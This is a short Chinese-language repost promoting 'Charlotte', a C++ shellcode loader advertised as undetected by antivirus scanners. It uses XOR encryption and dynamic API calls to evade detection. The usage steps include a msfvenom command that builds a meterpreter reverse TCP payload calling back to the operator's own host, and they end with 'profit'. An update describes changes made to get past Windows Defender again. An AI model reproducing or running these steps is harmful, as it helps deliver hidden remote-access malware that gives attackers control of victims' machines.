免杀 0/26 Charlotte C++ Shellcode 加载器

文章来源：  Khan安全攻防实验室

2021年5月13日：

1. c ++ shellcode启动器，截至2021年5月13日完全未检测到0/26。

2. 动态调用win32 api函数

3. Shellcode和函数名称的XOR加密

4. 每次运行随机XOR键和变量

5. 在Kali Linux上，只需“ apt-get install mingw-w64 *”就可以了！

2021年5月17日：

    1.随机字符串长度和XOR键长度

用法

        git克隆存储库，使用beacon.bin命名生成您的shellcode文件，然后运行charlotte.py

例子：

1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

2. cd charlotte

3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

4. python charlotte.py

5. profit

更新v1.1

2021/05/21：

显然，Microsoft Windows Defender能够检测到.DLL二进制文件，以及他们如何标记它？通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。

项目地址：

https://github.com/9emin1/charlotte